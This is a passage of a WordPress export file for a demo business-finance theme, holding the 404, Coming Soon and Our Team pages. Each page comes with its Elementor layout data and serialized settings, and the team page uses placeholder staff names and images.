}}s:11:"iaccordions";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iswitcher";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"title_left";i:1;s:11:"title_right";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:11:"title_color";i:1;s:9:"toggle_bg";i:1;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:6;s:5:"price";i:6;s:9:"price_for";i:6;s:7:"details";i:6;s:11:"is_featured";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:4;}}s:5:"style";a:1:{s:21:"style_content_section";a:2:{s:27:"price_typography_typography";i:6;s:28:"price_typography_font_family";i:6;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>404</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/404-error/</link>
		<pubDate>Wed, 09 Sep 2020 03:33:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=597</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-finance/">
					<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="Maxbizz Finance">
				</a>			        
			<h1>404</h1>		
			<h2>Sorry! Page Not Found!</h2>		
		<p>Oops! The page you are looking for does not exist. Please return to the site’s homepage.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/">TAKE ME HOME</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>597</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:33:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:33:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[404-error]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"dc90a5e","elType":"section","settings":{"height":"full","content_position":"middle","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-404.jpg","id":599},"css_classes":"error-404","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"ab481db","elType":"column","settings":{"_column_size":100,"_inline_size":null,"align":"center","_ot_content_align":""},"elements":[{"id":"ff9a571","elType":"widget","settings":{"align":"center","logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":2577},"logo_width":{"unit":"px","size":140,"sizes":[]},"_position":"fixed","_offset_x":{"size":0,"unit":"px"},"_offset_y":{"size":70,"unit":"px"},"_offset_y_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"2a1d1ef","elType":"widget","settings":{"title":"404","header_size":"h1","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":180,"sizes":[]},"typography_font_weight":"300","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":80,"sizes":[]},"typography_font_family":"Open Sans","typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"6bd4e37","elType":"widget","settings":{"title":"Sorry! Page Not Found!","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":42,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":34,"sizes":[]},"typography_line_height_mobile":{"unit":"em","size":1.1999999999999999555910790149937383830547332763671875,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"02eb208","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"b70cb7b","elType":"column","settings":{"_column_size":33,"_inline_size":30,"_inline_size_tablet":20},"elements":[],"isInner":true},{"id":"2ca71f3","elType":"column","settings":{"_column_size":33,"_inline_size":38.88900000000000289901436190120875835418701171875,"_inline_size_tablet":60},"elements":[{"id":"c0b5c0b","elType":"widget","settings":{"editor":"<p>Oops! The page you are looking for does not exist. Please return to the site\u2019s homepage.<\/p>","align":"center","text_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"column_gap":{"unit":"%","size":"","sizes":[]},"_element_custom_width":{"unit":"px","size":425,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1958c9e","elType":"column","settings":{"_column_size":33,"_inline_size":30.77499999999999857891452847979962825775146484375,"_inline_size_tablet":20},"elements":[],"isInner":true}],"isInner":true},{"id":"c047923","elType":"widget","settings":{"_css_classes":"page-content","_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-search"},{"id":"64444b7","elType":"widget","settings":{"align":"center","text":"TAKE ME HOME","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-finance\/","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","background_color":"","border_color":""},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:4:{s:9:"_position";i:1;s:9:"_offset_x";i:1;s:9:"_offset_y";i:1;s:16:"_offset_y_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:3:{s:5:"title";i:2;s:11:"header_size";i:1;s:5:"align";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:11:"title_color";i:2;s:21:"typography_typography";i:2;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_family";i:1;s:22:"typography_line_height";i:1;s:29:"typography_line_height_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:1;s:10:"column_gap";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:5:"align";i:1;s:10:"text_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:1:{s:21:"_element_custom_width";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:1;s:3:"gap";i:1;s:6:"height";i:1;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:11:"css_classes";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_image";i:1;}}}}s:16:"wp-widget-search";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:1;s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/coming-soon/</link>
		<pubDate>Wed, 09 Sep 2020 03:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=604</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
							<img src="https://maxbizz.s3.amazonaws.com/images/05_Black.svg" alt="" loading="lazy" />								</a>
			<h2>Maxbizz is in the Works!</h2>		
		<ul data-zone="0" data-date="01/29/2021" data-day="Day" data-days="Days" data-hour="Hour" data-hours="Hours" data-min="Minute" data-mins="Minutes" data-second="Second" data-seconds="Seconds">
			<li>00<p>Days</p></li>
			<li>:</li>
			<li>00<p>Hours</p></li>
			<li>:</li>
			<li>00<p>Minutes</p></li>
			<li>:</li>
			<li>00<p>Seconds</p></li>
		</ul>
		<p>We are about to go live so watch this space!</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-finance/wp-admin/admin-ajax.php#wpcf7-f610-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="610" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f610-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><button>Sign Up</button>
</form>		
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>604</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"f1dbf06","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/coming-soon.jpg","id":607},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","height":"full","content_position":"middle","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"65f2915","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"adfe967","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05_Black.svg","id":2577},"image_size":"full","image_custom_dimension":{"width":"80","height":"80"},"width":{"unit":"px","size":140,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"link_to":"custom","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"image"},{"id":"32c523f","elType":"widget","settings":{"title":"Maxbizz is in the Works!","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":51,"sizes":[]},"typography_line_height":{"unit":"px","size":110,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":42,"sizes":[]},"typography_line_height_mobile":{"unit":"px","size":55,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"title_color":"#1A1A1A","typography_font_weight":"700"},"elements":[],"widgetType":"heading"},{"id":"df3cd75","elType":"widget","settings":{"day":"Day","hour":"Hour","min":"Minute","second":"Second","days":"Days","hours":"Hours","mins":"Minutes","seconds":"Seconds","_padding":{"unit":"px","top":"0","right":"0","bottom":"90","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"date":"2021-11-20 12:00","number_typography_typography":"custom","number_typography_font_family":"Open Sans","number_typography_font_weight":"600"},"elements":[],"widgetType":"icountdown"},{"id":"2c42310","elType":"widget","settings":{"editor":"<p>We are about to go live so watch this space!<\/p>","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]},"text_color":"#555555","typography_font_family":"Inter"},"elements":[],"widgetType":"text-editor"},{"id":"5507345","elType":"widget","settings":{"cf7":"610","_padding":{"unit":"px","top":"0","right":"0","bottom":"115","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"},{"id":"880944e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:22:"image_custom_dimension";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_line_height";i:1;s:27:"typography_font_size_mobile";i:1;s:29:"typography_line_height_mobile";i:1;s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:10:"icountdown";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:4:"date";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:3:{s:28:"number_typography_typography";i:1;s:29:"number_typography_font_family";i:1;s:29:"number_typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:6:{s:5:"align";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;s:10:"text_color";i:1;s:22:"typography_font_family";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:2:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:1;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;}}s:6:"layout";a:1:{s:14:"section_layout";a:2:{s:6:"height";i:1;s:16:"content_position";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=690</guid>
		<description></description>
		<content:encoded><![CDATA[our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				FINANCE MANAGER 			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team5.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team5-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Mary Flynn</h6>				CHIEF TECHNOLOGY OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team6.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team6-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Adam Oswald</h6>				CHIEF MARKETING OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team7.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team7.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team7-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
